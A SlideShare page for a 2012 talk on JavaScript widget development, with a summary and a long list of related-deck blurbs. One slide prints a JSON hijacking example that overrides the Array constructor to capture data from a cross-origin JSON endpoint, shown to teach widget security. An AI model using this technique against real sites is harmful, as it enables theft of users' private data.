Java scriptwidgetdevelopmentjstanbul2012
Download as pptx, pdf0 likes328 views
This document discusses best practices for developing JavaScript widgets. It begins by introducing widgets and their types, then discusses challenges like versioning, cross-domain restrictions, shared environments, and security. It provides recommendations for handling these challenges, such as using cache-revalidating scripts for versioning, cross-domain messaging for communication, and sanitization for security. The document concludes by addressing widget performance, emphasizing minimizing payload size, lazy loading, and yielding to avoid blocking.
1 of 27
Download to read offline
![Widget Security (lesser known)
JSON Hijacking
<script>
var captured = [];
function Array() {
for (var i = 0; i < 3; i++) {
this[i] setter = function(val)
{ captured.push(val); };
}
}
</script>
<script src="http://api.example.com/products.json"></script>](https://image.slidesharecdn.com/javascriptwidgetdevelopmentjstanbul2012-120729000210-phpapp02/85/Java-scriptwidgetdevelopmentjstanbul2012-21-320.jpg)
Ad
Recommended
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesVolkan Özçelik The document outlines best practices for JavaScript widget development, covering topics such as types of widgets, versioning, and security measures. It emphasizes the need for performance optimization, cross-domain compatibility, and careful handling of cookies and security vulnerabilities. Key recommendations include minimizing initial payloads, asynchronous initialization, and thorough sanitization of input to prevent security issues.
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) Volkan Özçelik The document discusses best practices for developing JavaScript widgets. It covers challenges like versioning, cross-domain restrictions, cookies, security, and performance. Versioning can be handled through URL parameters or initializing with a version number. Cross-domain issues can be addressed using techniques like CORS, postMessage, or JSONP. Security requires sanitizing inputs, whitelisting domains, and handling risks like XSS and CSRF. Performance involves minimizing payload size and network requests.
Conquering AngularJS Limitations
Conquering AngularJS LimitationsValeri Karpov The document discusses strategies for addressing common AngularJS challenges including SEO, responsive design, and integration testing. It recommends using Prerender.io to generate static HTML for search engines to index Single Page Apps. For responsive design, it suggests using reactive directives that emit events in response to screen size changes rather than having directives know about screen size. Finally, it outlines an approach to integration testing AngularJS directives in isolation using Karma and bootstrapping directives for testing DOM logic.
Lessons in Open Source from the MongooseJS ODM
Lessons in Open Source from the MongooseJS ODMValeri Karpov Valeri Karpov discusses his experience with the Mongoose ODM project for Node.js. He got involved after discovering Mongoose helped reduce his code, and later became the main maintainer. He provides an overview of how Mongoose works through schema validation, syntactic sugar for updates, and hooks/middleware. Recent additions include query middleware and promises support. Lessons learned include being responsive to issues and maintaining a clear vision for an open source project.
MongoDB MEAN Stack Webinar October 7, 2015
MongoDB MEAN Stack Webinar October 7, 2015Valeri Karpov The document discusses building a REST API using Node.js and MongoDB. It covers creating schemas for products, categories, and users using Mongoose. It also discusses building out routes for retrieving, adding, and removing data. Testing the API is covered using Mocha and Superagent to make HTTP requests. Schema design principles like embedding related data are also summarized.
Blazor - The New Silverlight?
Blazor - The New Silverlight?Christian Nagel The document discusses Blazor, a framework allowing .NET code execution in modern browsers without plug-ins, leveraging WebAssembly for better performance and portability. It includes an overview of WebAssembly's design goals, Blazor's capabilities such as dependency injection and Razor components, and compares it with Silverlight. The document also emphasizes the potential for various applications and encourages experimentation with the Blazor preview in Visual Studio 2019.
Testing your Single Page Application
Testing your Single Page ApplicationWekoslav Stefanovski The document presents an overview of a talk focused on testing single-page applications (SPAs), emphasizing the history, current relevance, and design for quality in software development. It discusses the evolution of JavaScript and the necessity of testing due to the complex nature of software with various types of tests and frameworks highlighted. The talk includes a demo using Knockout.js, showcasing practical testing methods with tools like QUnit and PhantomJS.
Introduction to PhantomJS
Introduction to PhantomJSErol Selitektay PhantomJS is a headless WebKit scriptable with JavaScript API that allows testing and automating web pages without requiring a browser to be displayed. It renders pages and outputs the results, supporting many test frameworks. PhantomJS can capture screenshots, monitor network performance, and automate tasks like testing, page scraping, and generating images/charts from websites. It works across platforms and provides a fast, native implementation of web standards without emulation.
Selenium testing
Selenium testingJason Myers This document discusses UI functional testing with Selenium and Python. It provides an overview of Selenium IDE, WebDriver, Server and Grid. It describes how Selenium IDE is a Firefox plugin that allows recording and playback of tests. WebDriver allows controlling browsers programmatically and supports many languages. The document also demonstrates different locator strategies like ID, XPath, name, CSS and link text that can be used with WebDriver. It shows examples of interacting with page elements by sending keys, clicking, and selecting options. Finally, it mentions that WebDriver Server allows parallel test execution across browsers using technologies like Azure.
Олександр Хотемський “ProtractorJS як інструмент браузерної автоматизації для...
Олександр Хотемський “ProtractorJS як інструмент браузерної автоматизації для...Dakiry The document discusses the ProtractorJS framework for automated testing of Angular applications, highlighting its ease of use compared to Java and its growing community support. It covers features like integration with various test runners, support for multiple browsers, and a focus on asynchronous programming with promises. Additionally, it provides links to examples and resources for further learning about the framework.
Tech IT Easy x DevTalk : "Secure Your Coding with OWASP"
Tech IT Easy x DevTalk : "Secure Your Coding with OWASP"Andi Rustandi Djunaedi The document discusses secure coding practices, focusing on web application vulnerabilities highlighted by the OWASP Top 10 list, including SQL injection and session fixation. It emphasizes the importance of addressing both security and performance issues, along with practical exercises to understand and mitigate these vulnerabilities. Additionally, the document includes resources for further exploration and suggests measures to prevent exploitation of these vulnerabilities.
jQuery Chicago 2014 - Next-generation JavaScript Testing
jQuery Chicago 2014 - Next-generation JavaScript TestingVlad Filippov This document discusses next-generation JavaScript testing tools. It introduces The Intern, an open source framework for testing JavaScript code with both unit and functional tests. The Intern supports cross-browser testing, integrates with services like SauceLabs and BrowserStack, and can run tests across continuous integration systems. The presentation provides examples of using The Intern to test different applications and frameworks.
In-browser storage and me
In-browser storage and meJason Casden I do not have any additional information to provide. Please let me know if you have any other questions!
Building a Multithreaded Web-Based Game Engine Using HTML5/CSS3 and JavaScrip...
Building a Multithreaded Web-Based Game Engine Using HTML5/CSS3 and JavaScrip...Corey Clark, Ph.D. The document discusses the technical aspects of building a web development platform using HTML5, WebGL, and WebSockets, focusing on multi-threading and parallel processing capabilities through web workers. It details performance comparisons of various browsers and implementations alongside server-side considerations for handling multiple concurrent users efficiently. Additionally, it presents the Jahova OS architecture and its modules for managing resources, events, and sessions.
Bringing The Sexy Back To WebWorkers
Bringing The Sexy Back To WebWorkersCorey Clark, Ph.D. The document discusses the use of web workers in building high-performance real-time web applications, emphasizing their ability to execute tasks in parallel while keeping the user interface responsive. It covers various types of web workers, their limitations, and performance considerations, highlighting the importance of effective memory synchronization. The document also includes practical demos, browser support, and lessons learned from development experiences.
Modern iframe programming
Modern iframe programmingbenvinegar This document discusses using iframes for various purposes such as sandboxing code from different domains or versions, asynchronous script loading, and cross-domain communication. It describes how iframes can execute code in a clean JavaScript environment isolated from the parent window. It also explains techniques like postMessage for communication between frames and using iframes with JSONP or document.domain to enable cross-domain requests and property access. The document provides examples of libraries that sandbox code in iframes like Twitter's @anywhere widget and the hiro.js testing framework.
Testing Single Page Webapp
Testing Single Page WebappAkshay Mathur This document provides an overview and agenda for a session on testing single-page web applications. It introduces the concepts of traditional and modern web applications, and how they differ in terms of page construction and the challenges they pose for testing. It then discusses technologies like Node.js, headless browsers, CasperJS and Splinter that help enable testing of dynamic DOM in single-page apps from outside the browser or without opening the browser. The agenda involves demonstrating how to test a UI using these tools by invoking tests from the Python console or command line.
Webdriver.io
Webdriver.io LinkMe Srl This document discusses the webdriver.io framework for automated browser testing. The author needed a framework for blackbox testing of a web interface like a user would. Webdriver.io provides JavaScript bindings for Selenium that allow writing tests in a synchronous style using the browser object. Tests can run across multiple browsers and platforms. The framework is easy to set up and use, supports plugins, and allows custom commands. Under the hood, it communicates with Selenium using the WebDriver protocol to automate actual browsers.
Avoiding Common Pitfalls in Ember.js
Avoiding Common Pitfalls in Ember.jsAlex Speller 1. Common routing pitfalls in Ember.js include incorrectly using resources vs routes, not understanding the validation vs setup phase of routing, and assuming route nesting matches template nesting.
2. Other common mistakes include forgetting to use the property helper with computed properties, not passing actions correctly to components, and having invalid JSON that silently fails in Ember Data.
3. Debugging challenges include swallowed promise errors and not using the debugger, console.log, or Ember Inspector tools effectively. Understanding function scope, native array methods, and action bubbling in CoffeeScript can also trip developers up.
Testing Mobile JavaScript (Fall 2010
Testing Mobile JavaScript (Fall 2010jeresig John Resig has been researching the mobile space and wants to ensure jQuery works well across popular mobile platforms and browsers. He discusses the challenges of defining the relevant platforms and browser versions due to a lack of public statistics. His testing strategy involves drawing a line to determine what to support, buying devices, downloading simulators, and using TestSwarm for automated testing. He recommends simulators and devices for different levels of support.
Blazor v1.1
Blazor v1.1Juan Luis Guerrero Minero This document provides an overview of Web Assembly (WASM) and Blazor. It discusses how WASM allows code to run in browsers without plugins and is optimized for speed and size. Examples of WASM usage include games, video editors, and CAD tools. Blazor is introduced as a framework that runs .NET code in browsers using WASM. It follows an MVVM pattern and enables two-way data binding. The document compares Blazor to other technologies and provides resources for learning more.
Microservices for the Masses with Spring Boot, JHipster, and JWT - Rich Web 2016
Microservices for the Masses with Spring Boot, JHipster, and JWT - Rich Web 2016Matt Raible The document discusses microservices architecture, emphasizing the importance of starting with a modular monolith before transitioning to microservices as complexity grows. It highlights the use of Spring Boot and JHipster for application development, detailing the installation process and features generated by JHipster. Additionally, it covers API security protocols, JWT creation and validation, and mentions future updates in microservices technology.
ClubAJAX Basics - Server Communication
ClubAJAX Basics - Server CommunicationMike Wilcox AJAX allows asynchronous communication between the client and server without refreshing the page. It uses techniques like XMLHttpRequest, iFrames, and remote scripting to update parts of the DOM without reloading the entire page. The same origin policy prevents scripts from one origin accessing properties from another for security. Popular browsers that support AJAX include Internet Explorer, Firefox, and WebKit which powers Safari and Chrome.
Next generation frontend tooling
Next generation frontend toolingpksjce The document discusses modern JavaScript tooling and trends. It outlines problems with existing tools like slow performance and poor source mapping. Emerging tools like Vitejs and Snowpack are faster and support ES modules and features like instant loading and HMR. The document argues the JavaScript ecosystem is entering a third age driven by ESM, Rust/Go for tooling, and emerging technologies like Deno. Resources are provided to learn more about Vitejs, Snowpack, and trends in frontend tooling.
jQuery Keynote - Fall 2010
jQuery Keynote - Fall 2010jeresig The document summarizes the state of the jQuery project in Fall 2010. It discusses how project funds have been and will be spent, including on server infrastructure, developer time, design work, and conferences. Governance rules and a contribution path for new developers are being formalized. The copyright for a book is being transferred to the project. A CLA process and store selling t-shirts have launched. jQuery 1.4.3 and related plugins improved performance, modularity, CSS, and the development process. Finally, jQuery Mobile is a new framework to build sites for all mobile browsers and platforms.
Modern Web Framework : Play framework
Modern Web Framework : Play frameworkSuman Adak - Play is a popular Java web framework that aims to optimize developer productivity through conventions over configurations and other features.
- It provides stateless MVC architecture, easy reloading of changes without redeploying, and includes testing frameworks.
- Play emphasizes features like asynchronous I/O, CRUD modules, job scheduling, and integration with Heroku, Bootstrap, and Git.
Build the mobile web you want
Build the mobile web you wantk88hudson The document discusses building mobile web applications using new technologies like service workers and transpilation/polyfilling to overcome limitations of the web. It advocates "hacking" by testing new features early, building new abstractions, and pushing boundaries. It describes a prototype for a "hybrid" mobile app that uses an Android activity and webview, with a communication layer between JavaScript and Java for features like routing, state management, and device integration like the camera. The goal is to build the mobile web in a way that addresses issues like offline usage and performance, while paving the way for future improvements.
Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Aaron Hnatiw The document discusses race conditions in web applications, defining them as flaws that lead to unexpected results due to timing issues in concurrent actions. It introduces 'race-the-web' (RTW), a tool for automating race condition discovery, and compares its speed and effectiveness to Burp Intruder. The document also emphasizes defense strategies against race conditions, including various locking mechanisms and transaction isolation methods across different programming environments.
WWW/Internet 2011 - A Framework for Web 2.0 Secure Widgets
WWW/Internet 2011 - A Framework for Web 2.0 Secure WidgetsVagner Santana This document proposes a framework for securely reusing Web 2.0 widgets using JavaScript. It discusses common security attacks related to JavaScript like XSS and CSRF. The framework uses a proxy pattern to mediate cross-domain requests and ensure proper filtering of content at the client. It assumes the web page and communication channels are secure and free of vulnerabilities. The overall architecture is inspired by MVC and templates are used to embed filtered UI components from widgets. The framework aims to address gaps in the literature around securely enabling cross-domain functionality without requiring changes from users.
Html5 security
Html5 securityKrishna T The document discusses security considerations for HTML5. It notes that while HTML5 specifications are not inherently flawed, bad code can introduce new vulnerabilities. It outlines several attack vectors like XSS, history tampering, web storage manipulation, and clickjacking. It also discusses mitigations like script isolation, cross-document messaging, sandboxing, and CORS, noting their limitations. The document aims to raise awareness of the expanded client-side attack surface in HTML5.
More Related Content
What's hot (20)
Selenium testing
Selenium testingJason Myers This document discusses UI functional testing with Selenium and Python. It provides an overview of Selenium IDE, WebDriver, Server and Grid. It describes how Selenium IDE is a Firefox plugin that allows recording and playback of tests. WebDriver allows controlling browsers programmatically and supports many languages. The document also demonstrates different locator strategies like ID, XPath, name, CSS and link text that can be used with WebDriver. It shows examples of interacting with page elements by sending keys, clicking, and selecting options. Finally, it mentions that WebDriver Server allows parallel test execution across browsers using technologies like Azure.
Олександр Хотемський “ProtractorJS як інструмент браузерної автоматизації для...
Олександр Хотемський “ProtractorJS як інструмент браузерної автоматизації для...Dakiry The document discusses the ProtractorJS framework for automated testing of Angular applications, highlighting its ease of use compared to Java and its growing community support. It covers features like integration with various test runners, support for multiple browsers, and a focus on asynchronous programming with promises. Additionally, it provides links to examples and resources for further learning about the framework.
Tech IT Easy x DevTalk : "Secure Your Coding with OWASP"
Tech IT Easy x DevTalk : "Secure Your Coding with OWASP"Andi Rustandi Djunaedi The document discusses secure coding practices, focusing on web application vulnerabilities highlighted by the OWASP Top 10 list, including SQL injection and session fixation. It emphasizes the importance of addressing both security and performance issues, along with practical exercises to understand and mitigate these vulnerabilities. Additionally, the document includes resources for further exploration and suggests measures to prevent exploitation of these vulnerabilities.
jQuery Chicago 2014 - Next-generation JavaScript Testing
jQuery Chicago 2014 - Next-generation JavaScript TestingVlad Filippov This document discusses next-generation JavaScript testing tools. It introduces The Intern, an open source framework for testing JavaScript code with both unit and functional tests. The Intern supports cross-browser testing, integrates with services like SauceLabs and BrowserStack, and can run tests across continuous integration systems. The presentation provides examples of using The Intern to test different applications and frameworks.
In-browser storage and me
In-browser storage and meJason Casden I do not have any additional information to provide. Please let me know if you have any other questions!
Building a Multithreaded Web-Based Game Engine Using HTML5/CSS3 and JavaScrip...
Building a Multithreaded Web-Based Game Engine Using HTML5/CSS3 and JavaScrip...Corey Clark, Ph.D. The document discusses the technical aspects of building a web development platform using HTML5, WebGL, and WebSockets, focusing on multi-threading and parallel processing capabilities through web workers. It details performance comparisons of various browsers and implementations alongside server-side considerations for handling multiple concurrent users efficiently. Additionally, it presents the Jahova OS architecture and its modules for managing resources, events, and sessions.
Bringing The Sexy Back To WebWorkers
Bringing The Sexy Back To WebWorkersCorey Clark, Ph.D. The document discusses the use of web workers in building high-performance real-time web applications, emphasizing their ability to execute tasks in parallel while keeping the user interface responsive. It covers various types of web workers, their limitations, and performance considerations, highlighting the importance of effective memory synchronization. The document also includes practical demos, browser support, and lessons learned from development experiences.
Modern iframe programming
Modern iframe programmingbenvinegar This document discusses using iframes for various purposes such as sandboxing code from different domains or versions, asynchronous script loading, and cross-domain communication. It describes how iframes can execute code in a clean JavaScript environment isolated from the parent window. It also explains techniques like postMessage for communication between frames and using iframes with JSONP or document.domain to enable cross-domain requests and property access. The document provides examples of libraries that sandbox code in iframes like Twitter's @anywhere widget and the hiro.js testing framework.
Testing Single Page Webapp
Testing Single Page WebappAkshay Mathur This document provides an overview and agenda for a session on testing single-page web applications. It introduces the concepts of traditional and modern web applications, and how they differ in terms of page construction and the challenges they pose for testing. It then discusses technologies like Node.js, headless browsers, CasperJS and Splinter that help enable testing of dynamic DOM in single-page apps from outside the browser or without opening the browser. The agenda involves demonstrating how to test a UI using these tools by invoking tests from the Python console or command line.
Webdriver.io
Webdriver.io LinkMe Srl This document discusses the webdriver.io framework for automated browser testing. The author needed a framework for blackbox testing of a web interface like a user would. Webdriver.io provides JavaScript bindings for Selenium that allow writing tests in a synchronous style using the browser object. Tests can run across multiple browsers and platforms. The framework is easy to set up and use, supports plugins, and allows custom commands. Under the hood, it communicates with Selenium using the WebDriver protocol to automate actual browsers.
Avoiding Common Pitfalls in Ember.js
Avoiding Common Pitfalls in Ember.jsAlex Speller 1. Common routing pitfalls in Ember.js include incorrectly using resources vs routes, not understanding the validation vs setup phase of routing, and assuming route nesting matches template nesting.
2. Other common mistakes include forgetting to use the property helper with computed properties, not passing actions correctly to components, and having invalid JSON that silently fails in Ember Data.
3. Debugging challenges include swallowed promise errors and not using the debugger, console.log, or Ember Inspector tools effectively. Understanding function scope, native array methods, and action bubbling in CoffeeScript can also trip developers up.
Testing Mobile JavaScript (Fall 2010
Testing Mobile JavaScript (Fall 2010jeresig John Resig has been researching the mobile space and wants to ensure jQuery works well across popular mobile platforms and browsers. He discusses the challenges of defining the relevant platforms and browser versions due to a lack of public statistics. His testing strategy involves drawing a line to determine what to support, buying devices, downloading simulators, and using TestSwarm for automated testing. He recommends simulators and devices for different levels of support.
Blazor v1.1
Blazor v1.1Juan Luis Guerrero Minero This document provides an overview of Web Assembly (WASM) and Blazor. It discusses how WASM allows code to run in browsers without plugins and is optimized for speed and size. Examples of WASM usage include games, video editors, and CAD tools. Blazor is introduced as a framework that runs .NET code in browsers using WASM. It follows an MVVM pattern and enables two-way data binding. The document compares Blazor to other technologies and provides resources for learning more.
Microservices for the Masses with Spring Boot, JHipster, and JWT - Rich Web 2016
Microservices for the Masses with Spring Boot, JHipster, and JWT - Rich Web 2016Matt Raible The document discusses microservices architecture, emphasizing the importance of starting with a modular monolith before transitioning to microservices as complexity grows. It highlights the use of Spring Boot and JHipster for application development, detailing the installation process and features generated by JHipster. Additionally, it covers API security protocols, JWT creation and validation, and mentions future updates in microservices technology.
ClubAJAX Basics - Server Communication
ClubAJAX Basics - Server CommunicationMike Wilcox AJAX allows asynchronous communication between the client and server without refreshing the page. It uses techniques like XMLHttpRequest, iFrames, and remote scripting to update parts of the DOM without reloading the entire page. The same origin policy prevents scripts from one origin accessing properties from another for security. Popular browsers that support AJAX include Internet Explorer, Firefox, and WebKit which powers Safari and Chrome.
Next generation frontend tooling
Next generation frontend toolingpksjce The document discusses modern JavaScript tooling and trends. It outlines problems with existing tools like slow performance and poor source mapping. Emerging tools like Vitejs and Snowpack are faster and support ES modules and features like instant loading and HMR. The document argues the JavaScript ecosystem is entering a third age driven by ESM, Rust/Go for tooling, and emerging technologies like Deno. Resources are provided to learn more about Vitejs, Snowpack, and trends in frontend tooling.
jQuery Keynote - Fall 2010
jQuery Keynote - Fall 2010jeresig The document summarizes the state of the jQuery project in Fall 2010. It discusses how project funds have been and will be spent, including on server infrastructure, developer time, design work, and conferences. Governance rules and a contribution path for new developers are being formalized. The copyright for a book is being transferred to the project. A CLA process and store selling t-shirts have launched. jQuery 1.4.3 and related plugins improved performance, modularity, CSS, and the development process. Finally, jQuery Mobile is a new framework to build sites for all mobile browsers and platforms.
Modern Web Framework : Play framework
Modern Web Framework : Play frameworkSuman Adak - Play is a popular Java web framework that aims to optimize developer productivity through conventions over configurations and other features.
- It provides stateless MVC architecture, easy reloading of changes without redeploying, and includes testing frameworks.
- Play emphasizes features like asynchronous I/O, CRUD modules, job scheduling, and integration with Heroku, Bootstrap, and Git.
Build the mobile web you want
Build the mobile web you wantk88hudson The document discusses building mobile web applications using new technologies like service workers and transpilation/polyfilling to overcome limitations of the web. It advocates "hacking" by testing new features early, building new abstractions, and pushing boundaries. It describes a prototype for a "hybrid" mobile app that uses an Android activity and webview, with a communication layer between JavaScript and Java for features like routing, state management, and device integration like the camera. The goal is to build the mobile web in a way that addresses issues like offline usage and performance, while paving the way for future improvements.
Racing The Web - Hackfest 2016
Racing The Web - Hackfest 2016Aaron Hnatiw The document discusses race conditions in web applications, defining them as flaws that lead to unexpected results due to timing issues in concurrent actions. It introduces 'race-the-web' (RTW), a tool for automating race condition discovery, and compares its speed and effectiveness to Burp Intruder. The document also emphasizes defense strategies against race conditions, including various locking mechanisms and transaction isolation methods across different programming environments.
Similar to Java scriptwidgetdevelopmentjstanbul2012 (20)
WWW/Internet 2011 - A Framework for Web 2.0 Secure Widgets
WWW/Internet 2011 - A Framework for Web 2.0 Secure WidgetsVagner Santana This document proposes a framework for securely reusing Web 2.0 widgets using JavaScript. It discusses common security attacks related to JavaScript like XSS and CSRF. The framework uses a proxy pattern to mediate cross-domain requests and ensure proper filtering of content at the client. It assumes the web page and communication channels are secure and free of vulnerabilities. The overall architecture is inspired by MVC and templates are used to embed filtered UI components from widgets. The framework aims to address gaps in the literature around securely enabling cross-domain functionality without requiring changes from users.
Html5 security
Html5 securityKrishna T The document discusses security considerations for HTML5. It notes that while HTML5 specifications are not inherently flawed, bad code can introduce new vulnerabilities. It outlines several attack vectors like XSS, history tampering, web storage manipulation, and clickjacking. It also discusses mitigations like script isolation, cross-document messaging, sandboxing, and CORS, noting their limitations. The document aims to raise awareness of the expanded client-side attack surface in HTML5.
Html5 Application Security
Html5 Application Securitychuckbt This document discusses the application security implications of HTML5 features, highlighting updates, attack scenarios, and recommendations for securing applications. It covers topics such as local storage, web messaging, web sockets, and the fullscreen API, emphasizing potential security risks and the importance of compliance with security best practices. The presentation was delivered at a security conference and includes demos and resources for further information.
Protecting Your APIs Against Attack & Hijack
Protecting Your APIs Against Attack & Hijack CA API Management This webinar by K. Scott Morrison discusses the vulnerabilities and security challenges associated with APIs, highlighting key issues such as parameterization, identity management, and cryptography. It emphasizes the need for rigorous input validation, appropriate identity mechanisms, and strong encryption practices to protect against attacks. The session also advocates for using secure methods like SSL and OAuth to enhance API security and encourages learning from existing frameworks.
Optimizing Your Frontend Performance
Optimizing Your Frontend PerformanceThomas Weinert This document discusses various techniques for optimizing frontend performance, including:
1. Using hardware, backend, and frontend optimizations like combined and minified files, CSS sprites, browser caching headers, and content delivery networks.
2. Analyzing performance with tools like Firebug, YSlow, and Google Page Speed to identify opportunities.
3. Specific techniques like gzipping, avoiding redirects, placing scripts at the bottom, and making Ajax cacheable can improve performance.
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safeJeremiah Grossman The document discusses securing web applications from common vulnerabilities like cross-site scripting (XSS) and cross-site request forgery (CSRF). It outlines various techniques attackers use to exploit these issues, such as injecting malicious scripts into user input or forging unauthorized requests. The document then provides recommendations for developers to prevent these attacks, such as carefully validating and encoding all user input, and authenticating that requests are intended by the user.
Google I/O 2012 - Protecting your user experience while integrating 3rd party...
Google I/O 2012 - Protecting your user experience while integrating 3rd party...Patrick Meenan The document discusses strategies for integrating third-party code while maintaining a good user experience, emphasizing the importance of asynchronous loading of scripts to prevent blocking the main content. It highlights the necessity of monitoring performance and user experience, while suggesting best practices for script placement and dependency management. Additionally, it outlines the potential issues with third-party code in varied network environments and provides recommendations for both widget owners and site owners on handling such integrations.
Secure web messaging in HTML5
Secure web messaging in HTML5Krishna T The document provides an overview of secure web messaging in HTML5. It discusses how traditional methods of communication like JavaScript, AJAX, and frames had limitations due to the same-origin policy. The HTML5 postMessage API allows for secure cross-origin communication between frames by abstracting multiple principals. While more secure than previous techniques, the postMessage API still requires careful configuration of target origins, validation of received data, and mitigation of framing attacks to prevent security issues like cross-site scripting.
Web security
Web securitykareem zock The document outlines various web application vulnerabilities and defenses. It discusses outdated software, guessable passwords, exposed source code, client-side issues, authentication errors, injections, and cross-site scripting. It recommends strong defenses like updating software, encrypting source code, validating all user input, and using tools like mod_security to analyze code and monitor activity. The goal is to close vulnerabilities at each layer of a web application to prevent hackers from accessing sensitive data like databases.
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008Stephan Chenette The document presents a detailed analysis of script fragmentation attacks and their evasion techniques, which utilize small chunks of malicious content served to clients to avoid detection by security systems. It contrasts web 1.0 and web 2.0, highlighting the shift in attack trends and the ineffectiveness of current security measures against these sophisticated exploits. Possible solutions for detection and mitigation are suggested, alongside the presentation's conclusion that such attacks have yet to be widely observed in practice.
Top 10 Web Application vulnerabilities
Top 10 Web Application vulnerabilitiesTerrance Medina The document outlines the OWASP Top 10 web application vulnerabilities for 2017, focusing on common security issues such as injection attacks, broken authentication, and session management. It provides detailed explanations of each vulnerability including examples and defense mechanisms to mitigate risks. Best practices include using parameterized queries, rotating session IDs, and enforcing strict access control measures.
HTML5 - The Promise & The Peril
HTML5 - The Promise & The PerilSecurity Innovation The document discusses HTML5's security implications and features, highlighting both the benefits and risks associated with its use in web applications. Key areas of concern include cross-site scripting (XSS), local storage vulnerabilities, and the need for robust countermeasures throughout the software development lifecycle. It concludes with recommendations for secure coding practices and training solutions to help developers mitigate these risks.
Securing your web application through HTTP headers
Securing your web application through HTTP headersAndre N. Klingsheim 1) HTTP headers can be used to secure web applications from common attacks like cross-site scripting and clickjacking. Content Security Policy, X-Frame-Options, and HTTP Strict Transport Security are some useful security headers.
2) Content Security Policy allows specifying whitelist sources for things like scripts, stylesheets, and images to load from to prevent XSS. X-Frame-Options prevents clickjacking by not displaying pages within frames. HTTP Strict Transport Security forces HTTPS usage to prevent SSL stripping attacks.
3) Other useful headers include setting secure and HttpOnly flags on cookies to prevent session hijacking, and using X-Content-Type-Options to prevent MIME type sniffing in Internet Explorer. Adding these security
Krzysztof kotowicz. something wicked this way comes
Krzysztof kotowicz. something wicked this way comesYury Chemerkin Krzysztof Kotowicz presented several ways that HTML5 and user interaction could be abused by attackers:
- Filejacking allows uploading files from a user's system without consent by tricking them into selecting a folder. Sensitive files were taken from actual victims.
- AppCache poisoning can be used to persist malicious payloads on a user's system by tampering with application manifest files during a man-in-the-middle attack.
- Silent file upload constructs arbitrary files in JavaScript and uploads them to a victim site using cross-origin resource sharing if CSRF is possible. This was demonstrated against a real website.
- IFRAME sandboxing and drag-and-drop
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfssuser01066a This document provides an introduction to web security and the browser security model. It discusses goals of web security including safely browsing the web and supporting secure web applications. It outlines common web threat models and covers topics like HTTP, rendering content, isolation using frames and same-origin policy, communication between frames, frame navigation policies, client state using cookies, and clickjacking. The document aims to provide background knowledge on how the web and browsers work from a security perspective.
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesConviso Application Security The document discusses various security concerns associated with HTML5 features, particularly focusing on web application vulnerabilities like session hijacking, XSS (cross-site scripting), and attacks leveraging CORS (cross-origin resource sharing) and web workers. It provides insights into the same-origin policy, web storage, and web sockets, outlining specific attack vectors and how these technologies can be exploited for malicious purposes. The author emphasizes the importance of understanding these security issues in the context of modern web applications.
Wordpress Meetup
Wordpress MeetupCodal WordPress is a free and open-source content management system (CMS) that was originally released in 2003. It powers over 70 million websites and is used as both a blogging platform and CMS. WordPress is constantly evolving and improving, with thousands of plugins, widgets, and themes available. It is easy to use, flexible, extensible, and has strong support and SEO optimization features. To install WordPress, the minimum requirements are PHP version 5.6 or greater and MySQL version 5.6 or greater. The installation process involves downloading WordPress, uploading files to a web server, creating a database, configuring WordPress, and running the installation script.
Same Origin Policy Weaknesses
Same Origin Policy Weaknesseskuza55 The document discusses the weaknesses of the Same Origin Policy (SOP) in web security, detailing various types of attacks and vulnerabilities that can occur due to its limitations. It explores topics including cross-site scripting (XSS), cookie management, and the implications of different web components like JavaScript, Flash, and CSS in relation to SOP. The talk emphasizes the need for rigorous evaluation of new web technologies and the risks associated with insecure configurations.
How to Ensure You're Launching the Most Secure Website - Michael Tremante
How to Ensure You're Launching the Most Secure Website - Michael TremanteWP Engine The document outlines key practices for securing websites, focusing on DNS security, reducing application load, encrypting traffic, detecting automated traffic, and managing vulnerabilities. It emphasizes the importance of using reputable services, enabling two-factor authentication, and regularly updating software while also addressing the significance of proper traffic encryption and bot management. The document also provides actionable strategies such as caching, setting security headers, and monitoring external libraries to mitigate risks effectively.
Something wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceKrzysztof Kotowicz Krzysztof Kotowicz presented several HTML5 tricks that could be abused by attackers:
- Filejacking allows reading files from a user's system using the directory upload feature in Chrome. Sensitive files were exposed from some users.
- AppCache poisoning can be used in a man-in-the-middle attack to persist malicious payloads by tampering with a site's cache manifest file.
- Silent file upload uses cross-origin resource sharing to upload fake files without user interaction, potentially enabling CSRF attacks.
He warned that IFRAME sandboxing could facilitate clickjacking, and that drag-and-drop techniques risk exposing sensitive content across domains unless sites use X-
Ad
Recently uploaded (20)
Quantum AI Discoveries: Fractal Patterns Consciousness and Cyclical Universes
Quantum AI Discoveries: Fractal Patterns Consciousness and Cyclical UniversesSaikat Basu Embark on a cosmic journey exploring the intersection of quantum
computing, consciousness, and ancient wisdom. Together we'll uncover the
recursive patterns that bind our reality.
Salesforce Summer '25 Release Frenchgathering.pptx.pdf
Salesforce Summer '25 Release Frenchgathering.pptx.pdfyosra Saidani Salesforce Summer '25 Release Frenchgathering.pptx.pdf
AI vs Human Writing: Can You Tell the Difference?
AI vs Human Writing: Can You Tell the Difference?Shashi Sathyanarayana, Ph.D This slide illustrates a side-by-side comparison between human-written, AI-written, and ambiguous content. It highlights subtle cues that help readers assess authenticity, raising essential questions about the future of communication, trust, and thought leadership in the age of generative AI.
AI Agents and FME: A How-to Guide on Generating Synthetic Metadata
AI Agents and FME: A How-to Guide on Generating Synthetic MetadataSafe Software In the world of AI agents, semantics is king. Good metadata is thus essential in an organization's AI readiness checklist. But how do we keep up with the massive influx of new data? In this talk we go over the tips and tricks in generating synthetic metadata for the consumption of human users and AI agents alike.
Tech-ASan: Two-stage check for Address Sanitizer - Yixuan Cao.pdf
Tech-ASan: Two-stage check for Address Sanitizer - Yixuan Cao.pdfcaoyixuan2019 A presentation at Internetware 2025.
Quantum AI: Where Impossible Becomes Probable
Quantum AI: Where Impossible Becomes ProbableSaikat Basu Imagine combining the "brains" of Artificial Intelligence (AI) with the "super muscles" of Quantum Computing. That's Quantum AI!
It's a new field that uses the mind-bending rules of quantum physics to make AI even more powerful.
AI VIDEO MAGAZINE - June 2025 - r/aivideo
